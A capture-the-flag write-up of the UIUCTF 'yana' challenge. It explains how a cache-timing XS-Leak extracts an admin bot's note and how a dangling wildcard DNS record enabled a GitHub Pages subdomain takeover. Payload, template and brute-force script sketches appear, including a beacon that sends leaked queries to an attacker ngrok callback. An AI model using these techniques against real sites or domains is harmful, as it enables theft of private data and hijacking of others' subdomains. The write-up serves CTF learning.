yana
GitHub Pages subdomain takeover and cache probing XS-Leak
I made a note taking website. Can you get the admin's note?
https://chal.yana.wtf
admin bot: nc yana-bot.chal.uiuc.tf 1337
author: arxenix
This challenge was really great, even though there was an unintended solution. It took me on quite the journey, learning about cache probing attacks and subdomain takeovers.
The unintended solution stems from how Chrome handles cache partitioning. While Chrome 85 and later partitions the HTTP cache, effectively isolating cached resources by the site that requested them, running Chrome in headless mode does not achieve the same effect.
While not required to solve the challenge, figuring out the intended solution - a GitHub Pages subdomain takeover - was definitely an awesome experience.
This is a notepad app that functions entirely on the client-side. We can therefore analyze the JavaScript source code to look for vulnerabilities.
The app uses the browser's local storage to store the user's notes.
We can see this in action using Chrome DevTools.
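For instance, reading the note back from the DevTools console (the note key is an assumption; the Application tab shows the real one):

```js
// Notes are plain local storage entries.
localStorage.getItem('note');
```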
There is also a search feature that "searches" for notes. Interestingly, the search query gets placed into the URL's fragment identifier through document.location.hash.
The search is implemented in the search function, which grabs the URL's fragment identifier and checks whether it is a substring of the note stored in the browser's local storage.
If the query is a valid substring, the green https://sigpwny.com/uiuctf/y.png image is loaded and placed in the output div.
If the query is not found, the red https://sigpwny.com/uiuctf/n.png image is loaded instead.
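Based on that description, the search logic boils down to something like this sketch (the note storage key and the output element id are assumptions, not the verbatim source):

```js
// Sketch of the app's client-side search, reconstructed from its behavior.
function search() {
  // The query arrives via the fragment identifier.
  const query = decodeURIComponent(document.location.hash.substring(1));
  const note = localStorage.getItem('note') || '';
  const img = document.createElement('img');
  // Substring hit => y.png, miss => n.png.
  img.src = note.includes(query)
    ? 'https://sigpwny.com/uiuctf/y.png'
    : 'https://sigpwny.com/uiuctf/n.png';
  document.getElementById('output').replaceChildren(img);
}
```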
We are also provided with the bot.js script, which is the "admin" bot that visits any URL we give it. Notice that the flag is first saved as a note on the challenge server before our chosen URL is visited.
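Its behavior is roughly the following (a sketch of the flow, not the verbatim bot.js):

```js
const puppeteer = require('puppeteer');

// Sketch of the admin bot: save the flag as a note, then visit our URL.
async function visit(url) {
  const browser = await puppeteer.launch(); // headless: true is the default
  const page = await browser.newPage();
  await page.goto('https://chal.yana.wtf');
  // The flag is stored client-side, just like any other note.
  await page.evaluate(flag => localStorage.setItem('note', flag), process.env.FLAG);
  await page.goto(url); // attacker-controlled URL
  await new Promise(r => setTimeout(r, 5000)); // give the page time to run
  await browser.close();
}
```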
Now, we know that:
We are able to force the admin to visit the challenge server with any arbitrary fragment identifier, either directly (through submitting the challenge server URL to the bot) or indirectly (through JavaScript or iframes on our hosted site).
This will allow us to make the admin's browser perform the search function, checking whether the provided fragment identifier is a substring of the flag.
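For example, submitting a URL like the following makes the bot's browser search its own note for the prefix uiuctf{:

```
https://chal.yana.wtf/#uiuctf{
```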
At this point, I knew that it must have had something to do with brute-forcing the flag. However, since the search is performed on the client-side, we couldn't simply do a CSRF to get the search output.
Remember how the y.png and n.png images are loaded based on the search output?
Perhaps we can perform a cache probing attack to determine whether the search was successful. The principle is as follows:
1. The victim visits the attacker-controlled site, which loads an iframe of the notes site with a search query. If the search query is a substring of the flag, the https://sigpwny.com/uiuctf/y.png image is fetched and cached.
2. The attacker-controlled site then fetches the https://sigpwny.com/uiuctf/y.png image itself.
3. By measuring the time taken to fetch the image, the attacker-controlled site can determine whether the image was cached (the time taken would be significantly lower).
This would allow us to brute-force the flag character by character.
To implement the cache probing attack, we need to come up with a JavaScript payload that would be run on the victim's browser to determine whether the image was cached.
We define an onFrameLoad() function that will be called when the iframe of the notes site, containing the search query, is loaded.
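A sketch of such a payload (the 10 ms threshold, QUERY, and CALLBACK_URL are our own choices, filled in by the tooling below):

```js
// Once the iframe has run the search, time a fetch of y.png to see
// whether the search already cached it.
async function onFrameLoad() {
  const start = performance.now();
  await fetch('https://sigpwny.com/uiuctf/y.png', {
    mode: 'no-cors',      // cross-origin image; we only need the timing
    cache: 'force-cache', // use the cache if possible, else the network
  });
  const elapsed = performance.now() - start;
  // Threshold chosen experimentally: cache hits return almost instantly.
  if (elapsed < 10) {
    navigator.sendBeacon(CALLBACK_URL + '?query=' + encodeURIComponent(QUERY));
  }
}
```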
We then prepare a template.html with a placeholder for the search query.
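Something along these lines (the {{QUERY}} placeholder syntax and the callback endpoint are our own conventions):

```html
<!-- template.html: {{QUERY}} is substituted before the page is served. -->
<script>
  const QUERY = '{{QUERY}}';
  const CALLBACK_URL = 'https://example.ngrok.io/found'; // our ngrok endpoint
  // onFrameLoad() as defined above
</script>
<iframe src="https://chal.yana.wtf/#{{QUERY}}" onload="onFrameLoad()"></iframe>
```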
Then, an exploit.py script can automate the brute-force attack.
We will have to run this script for each new character, adding the previously found ones to the FLAG variable. (Perhaps I should have written a cleaner solution?)
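A sketch of such a script, assuming it serves the filled-in template and logs the payload's callbacks (each candidate URL still has to be submitted to the bot):

```python
#!/usr/bin/env python3
# exploit.py (sketch): serve exploit pages built from template.html and
# log callbacks from the payload. FLAG holds the characters found so far.
import http.server
import urllib.parse

FLAG = "uiuctf{"  # update with previously found characters between runs
TEMPLATE = open("template.html").read()

class Handler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        url = urllib.parse.urlparse(self.path)
        if url.path == "/found":
            # Callback from the payload: y.png was cached, so the query
            # is a substring of the flag.
            query = urllib.parse.parse_qs(url.query).get("query", [""])[0]
            print(f"[+] cache hit: {query!r}")
            self.send_response(204)
            self.end_headers()
            return
        # Serve /exploit?c=<candidate> with the placeholder filled in.
        cand = urllib.parse.parse_qs(url.query).get("c", [""])[0]
        body = TEMPLATE.replace("{{QUERY}}", FLAG + cand).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body)

http.server.HTTPServer(("0.0.0.0", 8000), Handler).serve_forever()
```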
In theory, though, this attack should not have worked. Here's why: I was hosting the exploit on an ngrok domain, but as of Chrome version 85, cache partitioning was implemented to defend against cache probing attacks. This update by Google in October 2020 explains how the new cache partitioning system works.
In brief, a new "Network Isolation Key" was added, which contains both the top-level site and the current-frame site. This allows the iframe's cache to be separate from the top-level site's cache. The following example illustrates our attack scenario.
The initial fetch of the image through the notes application iframe should result in a cache key of (attacker-site, notes-app-site, image-url). The second time the image is fetched, through the attacker-controlled site, the cache key would not contain the notes application site, and would instead be (attacker-site, attacker-site, image-url).
This should not result in a cache hit, since the two cache keys are different. But it did. After some local testing, I found that headless Chrome simply doesn't perform cache partitioning.
I ran the admin bot in headless mode (the default) as follows:
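Approximately (the exact invocation depends on how bot.js reads its input):

```sh
# bot.js launches Chrome via puppeteer, which defaults to headless: true
echo 'https://example.ngrok.io/exploit?c=a' | FLAG='uiuctf{test}' node bot.js
```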
The attack worked. Cache partitioning was not enabled.
But when I ran the bot with headless mode disabled, the attack did not work.
This was the expected result, since cache partitioning should be enabled by default.
We can verify that both times, y.png was downloaded from the network, not fetched from the cache!
Assuming that cache partitioning worked, how could we bypass it?
An important implementation detail is that subdomains and port numbers are ignored when creating the cache key; only the scheme and the registrable domain (eTLD+1) are used.
So when the image is requested by https://chal.yana.wtf/, only https://yana.wtf/ is actually saved in the cache key. This means that if we are able to control any *.yana.wtf subdomain, we would be able to bypass the cache partitioning, since both requests would originate from the same site.
From the whois records, we could tell that this was a GitHub Pages site.
I did not know this, but GitHub does not require you to prove that you actually own the domain before allowing you to set up a custom domain for your GitHub Pages site.
This opens up several possibilities for subdomain takeovers. As warned by the official documentation, a wildcard DNS record that points any subdomain to GitHub is especially dangerous.
A subdomain takeover can occur when there is a dangling DNS entry. Let me explain.
Using the dig command, we can find the DNS records configured for chal.yana.wtf.
An A record maps the domain to the GitHub Pages servers.
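For example (these are GitHub Pages' documented A-record addresses):

```sh
$ dig +short chal.yana.wtf A
185.199.108.153
185.199.109.153
185.199.110.153
185.199.111.153
```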
But if we poke around a little more, we find that the DNS configuration indeed seems to use a wildcard A record for *.yana.wtf. For instance, a.yana.wtf and b.yana.wtf do not have any GitHub Pages site associated with them, yet still point to the GitHub Pages servers.
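Querying an arbitrary subdomain returns the same addresses:

```sh
$ dig +short a.yana.wtf A
185.199.108.153
185.199.109.153
185.199.110.153
185.199.111.153
```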
Going to http://a.yana.wtf, therefore, will still forward the request to GitHub. GitHub looks for a repository with the appropriate CNAME file. Since no repository is configured to serve a.yana.wtf, a 404 page is shown.
This is a dangling DNS record, since anyone with a GitHub account can add a CNAME file containing a.yana.wtf to their repository, thereby taking over the a.yana.wtf domain.
With the exploit scripts we created earlier, we can create our own GitHub Pages site.
We configure the custom domain to abc.yana.wtf, which creates the following CNAME file in our repository.
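```
abc.yana.wtf
```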
Now, if we go to http://abc.yana.wtf, we will find that our exploit is being served!
Now, things are a little different. Because both the iframe and the top-level site are in the same yana.wtf domain, Chrome does not partition the cache. Notice that the first request, initiated by the iframe, fetched y.png from the network, while the second request, initiated by our exploit script, fetched y.png from the browser's cache.
This obviously causes a significant difference in the time taken to fetch the resources, allowing us to carry out the cache probing attack even when Chrome's cache partitioning policy is in effect.
As a sanity check, I ran the bot again locally without headless mode, this time providing it the https://abc.yana.wtf/exploit.html URL.
I confirmed that the exploit worked. Our exploit script determined that y.png was cached, and made a callback to our ngrok server with the successful query.